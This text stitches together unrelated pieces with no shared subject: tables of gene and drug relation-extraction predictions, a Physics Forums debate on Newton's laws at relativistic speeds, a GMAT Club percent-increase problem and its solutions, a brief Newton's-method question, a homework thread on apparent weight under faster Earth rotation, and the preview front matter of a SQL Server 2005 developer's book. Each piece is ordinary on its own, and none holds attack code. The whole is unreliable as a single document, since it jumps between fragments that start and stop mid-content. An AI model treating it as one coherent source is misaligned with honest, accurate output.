ABCE1 ABCF2 in relation to normal melanocytes , abcb3 , abcb6 , abcc2 , abcc4 , abce1 and abcf2 were significantly increased in melanoma cell lines , whereas abca7 , abca12 , abcb2 , abcb4 , abcb5 and abcd1 showed lower expression levels . 0.008 0.002
IL4 IFNG in contrast , il-13ralpha2 mrna expression was up-regulated by ifn-gamma plus il-4 . 0.007 0.002
FCAR CD79A we report here the presence of circulating soluble fcalphar ( cd89 ) - iga complexes in patients with igan . 0.007 0.002
IL4 VCAM1 similarly , il-4 induced vcam-1 expression and augmented tnf-alpha-induced expression on huvec but did not affect vcam-1 expression on hdmec . 0.007 0.002
IL2 IFNG prostaglandin e2 at priming of naive cd4 + t cells inhibits acquisition of ability to produce ifn-gamma and il-2 , but not il-4 and il-5 . 0.006 0.002
IL2 FOXP3 il-1b promotes tgf-b1 and il-2 dependent foxp3 expression in regulatory t cells . 0.006 0.002
IL2 IFNG the detailed distribution of lymphokine-producing cells showed that il-2 and ifn-gamma-producing cells were located mainly in the follicular areas . 0.005 0.001
IFNG IL10 results : we found weak mrna expression of interleukin-4 ( il-4 ) and il-5 , and strong expression of il-6 , il-10 and ifn-gamma before therapy . 0.005 0.001
PIK3R1 PTEN both pten ( pi3k antagonist ) and pp2 ( unspecific phosphatase ) were down-regulated . 0.005 0.001
### Top Ten Sentences for Each Edge Type
Table 11: Contains the top ten predictions for each edge type. Highlighted words represent entities mentioned within the given sentence.
Edge Type Source Node Target Node Generative Model Prediction Discriminative Model Prediction Number of Sentences In Hetionet Text
DaG urinary bladder cancer TP53 1 0.945 2112 Existing conclusion : our findings indicate that the dsp53-285 can upregulate wild-type p53 expression in human bladder cancer cells through rna activation , and suppresses cells proliferation and metastasis in vitro and in vivo .
DaG ovarian cancer EGFR 1 0.937 1330 Existing conclusion : our data showed that increased expression of egfr is associated with poor prognosis of patients with eoc and dacomitinib may act as a novel , useful chemotherapy drug .
DaG stomach cancer TP53 1 0.937 2679 Existing conclusion : this meta-analysis suggests that p53 arg72pro polymorphism is associated with increased risk of gastric cancer in asians .
DaG lung cancer TP53 1 0.936 6813 Existing conclusion : these results suggest that high expression of the p53 oncoprotein is a favorable prognostic factor in a subset of patients with nsclc .
DaG breast cancer TCF7L2 1 0.936 56 Existing this meta-analysis demonstrated that tcf7l2 gene polymorphisms ( rs12255372 and rs7903146 ) are associated with an increased susceptibility to breast cancer .
DaG skin cancer COX2 1 0.935 73 Novel elevated expression of cox-2 has been associated with tumor progression in skin cancer through multiple mechanisms .
DaG thyroid cancer VEGFA 1 0.933 592 Novel as a conclusion , we suggest that vegf g +405 c polymorphism is associated with increased risk of ptc .
DaG stomach cancer EGFR 1 0.933 1237 Existing recently , high lymph node ratio is closely associated with egfr expression in advanced gastric cancer .
DaG liver cancer GPC3 1 0.933 1944 Novel conclusions serum gpc3 was overexpressed in hcc patients .
DaG stomach cancer CCR6 1 0.931 24 Novel the cox regression analysis showed that high expression of ccr6 was an independent prognostic factor for gc patients .
CtD Sorafenib liver cancer 1 0.99 6672 Existing tace plus sorafenib for the treatment of hepatocellular carcinoma : final results of the multicenter socrates trial .
CtD Methotrexate rheumatoid arthritis 1 0.989 14546 Existing comparison of low-dose oral pulse methotrexate and placebo in the treatment of rheumatoid arthritis .
CtD Auranofin rheumatoid arthritis 1 0.988 419 Existing auranofin versus placebo in the treatment of rheumatoid arthritis .
CtD Lamivudine hepatitis B 1 0.988 6709 Existing randomized controlled trials ( rcts ) comparing etv with lam for the treatment of hepatitis b decompensated cirrhosis were included .
CtD Doxorubicin urinary bladder cancer 1 0.988 930 Existing 17-year follow-up of a randomized prospective controlled trial of adjuvant intravesical doxorubicin in the treatment of superficial bladder cancer .
CtD Docetaxel breast cancer 1 0.987 5206 Existing currently , randomized phase iii trials have demonstrated that docetaxel is an effective strategy in the adjuvant treatment of breast cancer .
CtD Cimetidine psoriasis 0.999 0.987 12 Novel cimetidine versus placebo in the treatment of psoriasis .
CtD Olanzapine schizophrenia 1 0.987 3324 Novel a double-blind , randomised comparative trial of amisulpride versus olanzapine in the treatment of schizophrenia : short-term results at two months .
CtD Fulvestrant breast cancer 1 0.987 826 Existing phase iii clinical trials have demonstrated the clinical benefit of fulvestrant in the endocrine treatment of breast cancer .
CtD Pimecrolimus atopic dermatitis 1 0.987 531 Existing introduction : although several controlled clinical trials have demonstrated the efficacy and good tolerability of 1 % pimecrolimus cream for the treatment of atopic dermatitis , the results of these trials may not apply to real-life usage .
CbG Gefitinib EGFR 1 0.99 8746 Existing morphologic features of adenocarcinoma of the lung predictive of response to the epidermal growth factor receptor kinase inhibitors erlotinib and gefitinib .
CbG Adenosine EGFR 1 0.987 644 Novel it is well established that inhibiting atp binding within the egfr kinase domain regulates its function .
CbG Rosiglitazone PPARG 1 0.987 1498 Existing rosiglitazone is a potent peroxisome proliferator-activated receptor gamma agonist that decreases hyperglycemia by reducing insulin resistance in patients with type 2 diabetes mellitus .
CbG D-Tyrosine INSR 0.998 0.987 1713 Novel this result suggests that tyrosine phosphorylation of phosphatidylinositol 3-kinase by the insulin receptor kinase may increase the specific activity of the former enzyme in vivo .
CbG D-Tyrosine IGF1 0.998 0.983 819 Novel affinity-purified insulin-like growth factor i receptor kinase is activated by tyrosine phosphorylation of its beta subunit .
CbG Pindolol HTR1A 1 0.983 175 Existing pindolol , a betablocker with weak partial 5-ht1a receptor agonist activity has been shown to produce a more rapid onset of antidepressant action of ssris .
CbG Progesterone SHBG 1 0.981 492 Existing however , dng also elicits properties of progesterone derivatives like neutrality in metabolic and cardiovascular system and considerable antiandrogenic activity , the latter increased by lack of binding to shbg as specific property of dng .
CbG Mifepristone AR 1 0.98 78 Existing ru486 bound to the androgen receptor .
CbG Alfentanil OPRM1 1 0.979 10 Existing purpose : alfentanil is a high potency mu opiate receptor agonist commonly used during presurgical induction of anesthesia .
CbG Candesartan AGTR1 1 0.979 36 Existing tcv-116 is a new , nonpeptide , angiotensin ii type-1 receptor antagonist that acts as a specific inhibitor of the renin-angiotensin system .
GiG BRCA2 BRCA1 0.972 0.984 12257 Novel a total of 9 families ( 16 % ) showed mutations in the brca1 gene , including the one new mutation identified in this study ( 5382insc ) , and 12 families ( 21 % ) presented mutations in the brca2 gene .
GiG MDM2 TP53 0.938 0.978 17128 Existing no mutations in the tp53 gene have been found in samples with amplification of mdm2 .
GiG BRCA1 BRCA2 1 0.978 12257 Existing pathogenic truncating mutations in the brca1 gene were found in two tumor samples with allelic losses , whereas no mutations were identified in the brca2 gene .
GiG KRAS TP53 0.992 0.971 4106 Novel mutations in the p53 gene did not correlate with mutations in the c-k-ras gene , indicating that colorectal cancer can develop through pathways independent not only of the presence of mutations in any of these genes but also of their cooperation .
GiG TP53 HRAS 0.992 0.969 451 Novel pathologic examination of the uc specimens from aa-exposed patients identified heterozygous hras changes in 3 cases , and deletion or replacement mutations in the tp53 gene in 4 .
GiG REN NR1H3 0.998 0.966 8 Novel nuclear receptor lxralpha is involved in camp-mediated human renin gene expression .
GiG ESR2 CYP19A1 0.999 0.96 159 Novel dna methylation , histone modifications , and binding of estrogen receptor , erb to regulatory dna sequences of cyp19a1 gene were evaluated by chromatin immunoprecipitation ( chip ) assay .
GiG RET EDNRB 0.816 0.96 136 Novel mutations in the ret gene , which codes for a receptor tyrosine kinase , and in ednrb which codes for the endothelin-b receptor , have been shown to be associated with hscr in humans .
GiG PKD1 PKD2 1 0.959 1614 Existing approximately 85 % of adpkd cases are caused by mutations in the pkd1 gene , while mutations in the pkd2 gene account for the remaining 15 % of cases .
GiG LYZ CTCF 0.999 0.959 2 Novel in conjunction with the thyroid receptor ( tr ) , ctcf binding to the lysozyme gene transcriptional silencer mediates the thyroid hormone response element ( tre ) - dependent transcriptional repression .
1. Labeled sentences are available here.↩︎
|
# Why does Newtonian dynamics break down at the speed of light
1. Feb 14, 2015
### nisarg
I tried searching the web for this topic but got an answer like "formulae used in classical mechanics are approximations or simplifications of more accurate formulae such as the ones in quantum mechanics and special relativity". My question is that why do the laws of Sir Isaac Newton no longer apply to objects at the speed of light? Is it the formulae that are causing the problem or the laws?
I really need a detailed explanation to understand this topic thoroughly, so if someone could help me on this, I would be more than grateful.
Thanks
2. Feb 14, 2015
### Borg
Take a look at the Wikipedia article on General Relativity to start. There is a section that explains going from classical Newtonian mechanics to General Relativity.
3. Feb 14, 2015
Staff Emeritus
The laws are low velocity approximations. At higher and higher velocities, the laws get worse and worse.
4. Feb 14, 2015
### DrStupid
Do they? Galilean transformation fails at the speed of light, but Newton's laws of motion (in their original form) still apply. If it makes sense to use forces for photons is another question.
5. Feb 14, 2015
### Staff: Mentor
We just happen to live in a universe where Newtonian physics is not exact. It is perfectly possible to imagine a world where the laws are exact at all speeds (particle physics and some other fields would get problems , but let's ignore the microscopic part here), but experiments show we do not live in such a world.
Acceleration is not parallel to force in general. How does that agree with Newtonian physics?
6. Feb 14, 2015
### DrStupid
With replacement of Galilei transformation by Lorentz transformation Newton's "quantity of matter" becomes velocity dependent. In the result acceleration is no longer parallel to force.
7. Feb 14, 2015
### Staff: Mentor
I'm not too experienced with relativity so I'm not sure, but isn't the 4-force parallel to the 4-acceleration (unless the rest mass is changing)?
Chet
8. Feb 14, 2015
### Staff: Mentor
A velocity-dependent scalar mass is not sufficient, you would need some sort of "vector mass". And I think that is beyond Newton's equation of motion. Even the Lorentz transformations on their own are beyond Newton's physics.
9. Feb 14, 2015
### DrStupid
The velocity-dependent scalar mass
$m = \frac{{m_0 }}{{\sqrt {1 - \frac{{v^2 }}{{c^2 }}} }}$
results in
$a = \left( {\frac{F}{{m_0 }} - v \cdot \frac{{v \cdot F}}{{m_0 \cdot c^2 }}} \right) \cdot \sqrt {1 - \frac{{v^2 }}{{c^2 }}}$
There is no need for some sort of "vector mass".
Of course it is. That's why I limited my statement to Newton's laws of motion.
10. Feb 14, 2015
### Staff: Mentor
Okay, if you add those extra terms - I would not call this "Newton's laws of motion" any more.
11. Feb 14, 2015
### DrStupid
There are no extra terms.
12. Feb 14, 2015
### dextercioby
The 2nd law fails simply because it allows accelerating moving objects to increase their speed indefinitely, but as per the current valid theories and experimental results, nothing in our universe can move at a speed faster than c, when its speed is measured in an inertial ref. frame.
13. Feb 14, 2015
### Staff: Mentor
Compared to a=F/m?
14. Feb 14, 2015
### DrStupid
Compared to F=dp/dt
15. Feb 14, 2015
Staff Emeritus
You've rolled it into the second term in the pre-factor.
16. Feb 14, 2015
### DrStupid
Which second term of which pre-factor?
17. Feb 14, 2015
Staff Emeritus
The part with the dot product. That makes it directional.
18. Feb 14, 2015
### DrStupid
Are you confusing the equation for acceleration with the equation for quantity of matter (we better do not use the term mass at this place)? The latter does not contain such a part.
19. Feb 14, 2015
### Staff: Mentor
As I said in post number 7, if expressed in terms of the 4-force and 4-acceleration, Newton's second law is recovered intact.
Chet
20. Feb 14, 2015
### brainpushups
Newton made a few assumptions about nature that turned out to be incorrect. For example, Newton's conception of time in the definitions given in the Principia as a quantity that moves forward independently without regard to motion (I'm paraphrasing here) was questioned later by Mach who influenced Einstein. Einstein also knew that Maxwell's equations predicted electromagnetic waves that all traveled with the same speed... but relative to what? After the rejection of the lumineferous ether largely due to the Michelson-Morley experiment Einstein proposed the two postulates of special relativity - one of which is that the speed of light is the same for all observers regardless of their state of motion. One of the consequences of this postulate (which does not suppose that time runs the same for everyone) is that the amount of time elapsed depends on an observers state of motion. This (and other consequences) of special relativity are only important when the speeds of objects approach the speed of light. If the speeds are low then the predictions made by SR reduce to Newtonian mechanics.
So... to answer the question. It is the axiomatic assumptions that are 'causing the problems'
As others have said, Newton's laws are still applicable in SR if you change the definition of force and momentum to be their four-vector definitions. However, in my limited experience with SR I've noticed that the concept of force (in the Newtonian sense) is not very convenient simply because of how messy this would get when applying the Lorentz transformations. The form of the laws look the same when using four-vectors (which is probably one of the reasons that four-momentum was defined the way it was!), but I would argue that this isn't really Newton's laws anymore.
|
GMAT Question of the Day - Daily to your Mailbox; hard ones only
It is currently 20 Jun 2019, 12:59
### GMAT Club Daily Prep
#### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email.
Customized
for You
we will pick new questions that match your level based on your Timer History
Track
every week, we’ll send you an estimated GMAT score based on your performance
Practice
Pays
we will pick new questions that match your level based on your Timer History
# A shirt that costs k dollars is increased by 30%, then by an additiona
Author Message
TAGS:
### Hide Tags
Math Expert
Joined: 02 Sep 2009
Posts: 55732
A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
19 Aug 2018, 09:42
00:00
Difficulty:
5% (low)
Question Stats:
83% (00:54) correct 17% (01:09) wrong based on 67 sessions
### HideShow timer Statistics
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
_________________
VP
Status: Learning stage
Joined: 01 Oct 2017
Posts: 1009
WE: Supply Chain Management (Energy and Utilities)
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
19 Aug 2018, 11:50
Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
Original cost=$k Price of the shirt is increased by 30%. So, new price of the shirt=$$k(1+\frac{30}{100})=1.3k$$ Again, Price of the shirt is increased by an additional 50%, So, new price of the shirt=$$1.3k(1+\frac{50}{100})=1.3k*1.5=1.95k$$ Ans. (E) _________________ Regards, PKN Rise above the storm, you will find the sunshine Intern Joined: 17 Aug 2018 Posts: 18 Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink] ### Show Tags 19 Aug 2018, 15:55 =k*(1.30)(1.5) = 1.95k Posted from my mobile device Board of Directors Status: QA & VA Forum Moderator Joined: 11 Jun 2011 Posts: 4504 Location: India GPA: 3.5 WE: Business Development (Commercial Banking) Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink] ### Show Tags 20 Aug 2018, 07:16 Bunuel wrote: A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k? (A) 0.2k (B) 0.35k (C) 1.15k (D) 1.8k (E) 1.95k $$30 + 50 + \frac{30*50}{100}$$ $$= 80 + 15$$ So, There is a net Increase in value by 95%, thus the new price of the shirt in dollar terms is 1.95k, Answer must be (E) _________________ Thanks and Regards Abhishek.... PLEASE FOLLOW THE RULES FOR POSTING IN QA AND VA FORUM AND USE SEARCH FUNCTION BEFORE POSTING NEW QUESTIONS How to use Search Function in GMAT Club | Rules for Posting in QA forum | Writing Mathematical Formulas |Rules for Posting in VA forum | Request Expert's Reply ( VA Forum Only ) Manager Joined: 20 Jul 2018 Posts: 88 GPA: 2.87 Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink] ### Show Tags 20 Aug 2018, 08:59 increased by 30%=1.3k increased by further 50%=1.5*1.3k=1.95k _________________ Hasnain Afzal "When you wanna succeed as bad as you wanna breathe, then you will be successful." -Eric Thomas CEO Joined: 12 Sep 2015 Posts: 3786 Location: Canada Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink] ### Show Tags 24 Jan 2019, 06:51 Top Contributor Bunuel wrote: A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k? (A) 0.2k (B) 0.35k (C) 1.15k (D) 1.8k (E) 1.95k A shirt that costs k dollars is increased by 30%, So, the new coast = k + (30% of k) = k + 0.3k = 1.3k ASIDE So, increasing a value by 30% is the same as multiplying that value by 1.3 Similarly, increasing a value by 20% is the same as multiplying that value by 1.2 And increasing a value by 78% is the same as multiplying that value by 1.78 etc The price is increased by an additional 50%. New price = (1.5)(1.3k) = 1.95k Answer: E Cheers, Brent _________________ Test confidently with gmatprepnow.com EMPOWERgmat Instructor Status: GMAT Assassin/Co-Founder Affiliations: EMPOWERgmat Joined: 19 Dec 2014 Posts: 14353 Location: United States (CA) GMAT 1: 800 Q51 V49 GRE 1: Q170 V170 Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink] ### Show Tags 26 Jan 2019, 13:39 Hi All, We're told that the price of a shirt that costs K dollars is increased by 30%, then that price is increased by an additional 50%. We're asked for the final price of the shirt in dollars, in terms of K. This question can be solved in a number of different ways - including Algebraically and by TESTing VALUES. Based on the answer choices though, you can actually answer this question with just a little logic. Increasing a value by 30% and then increasing that new overall value by 50% is a concept that's sometimes referred to as "interest on top of interest." In simple terms, it means that the overall increase will be greater than the sum of the two individual increases (since the second increase will be based on the prior increased-value - and not the starting value). Here, that would mean that the overall increase would be GREATER than 30+50 = 80%. There's only one answer that matches... Final Answer: GMAT assassins aren't born, they're made, Rich _________________ 760+: Learn What GMAT Assassins Do to Score at the Highest Levels Contact Rich at: [email protected] *****Select EMPOWERgmat Courses now include ALL 6 Official GMAC CATs!***** # Rich Cohen Co-Founder & GMAT Assassin Special Offer: Save$75 + GMAT Club Tests Free
Official GMAT Exam Packs + 70 Pt. Improvement Guarantee
www.empowergmat.com/
SVP
Joined: 26 Mar 2013
Posts: 2237
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
27 Jan 2019, 05:47
Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
Let the k= 1000.........price with 30% increase = 1300...............Price with 50% increase= 1950
It is obvious that one answer fits 1.95K= 1950
Target Test Prep Representative
Status: Founder & CEO
Affiliations: Target Test Prep
Joined: 14 Oct 2015
Posts: 6590
Location: United States (CA)
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink]
### Show Tags
01 Feb 2019, 18:32
Bunuel wrote:
A shirt that costs k dollars is increased by 30%, then by an additional 50%. What is the new price of the shirt in dollars, in terms of k?
(A) 0.2k
(B) 0.35k
(C) 1.15k
(D) 1.8k
(E) 1.95k
The new price of the shirt is k x 1.3 x 1.5 = 1.95k.
_________________
# Scott Woodbury-Stewart
Founder and CEO
[email protected]
122 Reviews
5-star rated online GMAT quant
self study course
See why Target Test Prep is the top rated GMAT quant course on GMAT Club. Read Our Reviews
If you find one of my posts helpful, please take a moment to click on the "Kudos" button.
Re: A shirt that costs k dollars is increased by 30%, then by an additiona [#permalink] 01 Feb 2019, 18:32
Display posts from previous: Sort by
|
## newtons method
is the forumula $x - \frac{f(x)}{f '(x)}$ function then derivative of function.
or
$x - \frac{f '(x)}{f ''(x)}$ first then 2nd derivation of function
ive come across some questions that are first one and also 2nd one?
thanks
|
# Change of weight with faster Earth rotation.
#### tkninetyfive
1. Homework Statement
m=55kg
r=6400km
The earths rotation increases so on a bathroom scale, it now reads that you weight 0.
how long is 1 "day" on Earth?
2. Homework Equations
I keep trying to figure this one out, but with different ways Ive tried, I put Fg as 0 and it basically negates my whole equation. The section in the course we are on right now is Centrapetal force and gravitation.
3. The Attempt at a Solution
This is the one "answer" Ive gotten but it seems a little too easy.
fnet=ma
fc=mac
fc=mv2/r
mg=mv2/r
g=v2/r
√rg=v
plug in the radius in metres, 9.8 for g to get v, and then solve with 2∏r/v which is the same a d/v=t.
any help? :(
Related Introductory Physics Homework Help News on Phys.org
#### AJ Bentley
Quite right.
Initial weight = mg = 55*9.81 Newtons
Centripetal force = mv^2/r.
Since the weight is balanced exactly by this force, we must have
mg =mv^2/r ,which gives v.
#### bossman27
I keep trying to figure this one out, but with different ways Ive tried, I put Fg as 0 and it basically negates my whole equation. The section in the course we are on right now is Centrapetal force and gravitation.
The reason you can't do $F_{g} = 0$ is because it isn't 0. What you want is $F_{net} = 0 = F_{g} - F{c} \Rightarrow F_{g} = F_{c}$
It looks like this is what you ended up doing, and I don't see any problems with your attempt. I don't think it was meant to be a hugely difficult problem.
Edit: To be completely accurate, the normal centripetal force of the earth supplies about 2 Newtons (or so, depending on your mass) of upward force, so to be completely accurate you could show how to find this "usual" centripetal force, and then factor that in. Since a normal person weighs somewhere in the 600-ish Newton range though, it should only make a small difference in your answer.
Last edited:
### Physics Forums Values
We Value Quality
• Topics based on mainstream science
• Proper English grammar and spelling
We Value Civility
• Positive and compassionate attitudes
• Patience while debating
We Value Productivity
• Disciplined to remain on-topic
• Recognition of own weaknesses
• Solo and co-op problem solving
|
# Microsoft SQL Server 2005 Developer’s Guide- P0
Chia sẻ: Cong Thanh | Ngày: | Loại File: PDF | Số trang:20
0
125
lượt xem
64
download
## Microsoft SQL Server 2005 Developer’s Guide- P0
Mô tả tài liệu
Download Vui lòng tải xuống để xem tài liệu đầy đủ
Microsoft SQL Server 2005 Developer’s Guide- P0:This book is the successor to the SQL Server 2000 Developer’s Guide, which was extremely successful thanks to all of the supportive SQL Server developers who bought that edition of the book. Our first thanks go to all of the people who encouraged us to write another book about Microsoft’s incredible new relational database server: SQL Server 2005.
Chủ đề:
Bình luận(0)
Lưu
## Nội dung Text: Microsoft SQL Server 2005 Developer’s Guide- P0
1. Microsoft SQL Server™ 2005 ® Developer’s Guide Michael Otey Denielle Otey McGraw-Hill/Osborne New York Chicago San Francisco Lisbon London Madrid Mexico City Milan New Delhi San Juan Seoul Singapore Sydney Toronto
2. Copyright © 2006 by The McGraw-Hill Companies. All rights reserved. Manufactured in the United States of America. Except as permitted under the United States Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher. 0-07-148348-9 The material in this eBook also appears in the print version of this title: 0-07-226099-8. All trademarks are trademarks of their respective owners. Rather than put a trademark symbol after every occurrence of a trademarked name, we use names in an editorial fashion only, and to the benefit of the trademark owner, with no intention of infringement of the trademark. Where such designations appear in this book, they have been printed with initial caps. McGraw-Hill eBooks are available at special quantity discounts to use as premiums and sales promotions, or for use in corporate training pro- grams. For more information, please contact George Hoare, Special Sales, at [email protected] or (212) 904-4069. TERMS OF USE This is a copyrighted work and The McGraw-Hill Companies, Inc. (“McGraw-Hill”) and its licensors reserve all rights in and to the work. Use of this work is subject to these terms. Except as permitted under the Copyright Act of 1976 and the right to store and retrieve one copy of the work, you may not decompile, disassemble, reverse engineer, reproduce, modify, create derivative works based upon, transmit, distribute, dis- seminate, sell, publish or sublicense the work or any part of it without McGraw-Hill’s prior consent. You may use the work for your own non- commercial and personal use; any other use of the work is strictly prohibited. Your right to use the work may be terminated if you fail to com- ply with these terms. THE WORK IS PROVIDED “AS IS.” McGRAW-HILL AND ITS LICENSORS MAKE NO GUARANTEES OR WARRANTIES AS TO THE ACCURACY, ADEQUACY OR COMPLETENESS OF OR RESULTS TO BE OBTAINED FROM USING THE WORK, INCLUDING ANY INFORMATION THAT CAN BE ACCESSED THROUGH THE WORK VIA HYPERLINK OR OTHERWISE, AND EXPRESSLY DIS- CLAIM ANY WARRANTY, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO IMPLIED WARRANTIES OF MER- CHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. McGraw-Hill and its licensors do not warrant or guarantee that the func- tions contained in the work will meet your requirements or that its operation will be uninterrupted or error free. Neither McGraw-Hill nor its licensors shall be liable to you or anyone else for any inaccuracy, error or omission, regardless of cause, in the work or for any damages result- ing therefrom. McGraw-Hill has no responsibility for the content of any information accessed through the work. Under no circumstances shall McGraw-Hill and/or its licensors be liable for any indirect, incidental, special, punitive, consequential or similar damages that result from the use of or inability to use the work, even if any of them has been advised of the possibility of such damages. This limitation of liability shall apply to any claim or cause whatsoever whether such claim or cause arises in contract, tort or otherwise. DOI: 10.1036/0072260998
3. Professional Want to learn more? We hope you enjoy this McGraw-Hill eBook! If you’d like more information about this book, its author, or related books and websites, please click here.
4. To Mom and Dad, Ray and Dortha Marty, For many years of dedication and encouragement, and great bowling advice.
5. About the Authors Michael Otey is Senior Technical Editor of SQL Server Magazine and co-author of SQL Server 2000 Developer’s Guide, SQL Server 7 Developer’s Guide, and ADO.NET: The Complete Reference. He is the president of TECA, Inc., a software development and consulting firm. Denielle Otey is vice president of TECA, Inc. She has extensive experience developing commercial software products, and is the co-author of ADO.NET: The Complete Reference. Copyright © 2006 by The McGraw-Hill Companies. Click here for terms of use.
6. For more information about this title, click here Contents Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xiii Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xiv Chapter 1 The Development Environment . . . . . . . . . . . . . . . . . . . . . . . . 1 SQL Server Management Studio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 The SQL Server Management Studio User Interface . . . . . . . . . . . . . . . . 3 SQL Server Management Studio User Interface Windows . . . . . . . . . . . . . . 4 SQL Server 2005 Administrative Tools . . . . . . . . . . . . . . . . . . . . . . . 14 BI Development Studio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 The Business Intelligence Development Studio User Interface . . . . . . . . . . . . 16 BI Development Studio User Interface Windows . . . . . . . . . . . . . . . . . . 16 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 Chapter 2 Developing with T-SQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 T-SQL Development Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 SQL Server Management Studio . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Visual Studio 2005 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27 Creating Database Objects Using T-SQL DDL . . . . . . . . . . . . . . . . . . . . . . . . 34 Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35 Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36 Views . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 Synonyms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 Stored Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43 Triggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 Storage for Searching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 v
7. vi M i c r o s o f t S Q L S e r v e r 2 0 0 5 D e v e l o p e r ’s G u i d e Querying and Updating with T-SQL DML . . . . . . . . . . . . . . . . . . . . . . . . . . 49 Select and Joins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 Modifying Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75 Chapter 3 Developing CLR Database Objects . . . . . . . . . . . . . . . . . . . . . . 77 Understanding CLR and SQL Server 2005 Database Engine . . . . . . . . . . . . . . . . 78 CLR Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 Enabling CLR Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 CLR Database Object Components . . . . . . . . . . . . . . . . . . . . . . . . . 80 Creating CLR Database Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 CLR Stored Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 User-Defined Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Triggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 User-Defined Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99 Aggregates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105 Debugging CLR Database Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110 .NET Database Object Security . . . . . . . . . . . . . . . . . . . . . . . . . . . 112 Managing CLR Database Objects . . . . . . . . . . . . . . . . . . . . . . . . . . 115 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115 Chapter 4 SQL Server Service Broker . . . . . . . . . . . . . . . . . . . . . . . . . . 117 SQL Server Service Broker Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . 118 Messages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119 Queues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120 Contracts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120 Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120 Dialogs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120 Developing SQL Service Broker Applications . . . . . . . . . . . . . . . . . . . . . . . . 122 SQL Server Service Broker DDL and DML . . . . . . . . . . . . . . . . . . . . . 122 T-SQL DDL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122 T-SQL DML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122 Enabling SQL Server Broker . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122 Using Queues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124 Sample SQL Server Service Broker Application . . . . . . . . . . . . . . . . . . . 125
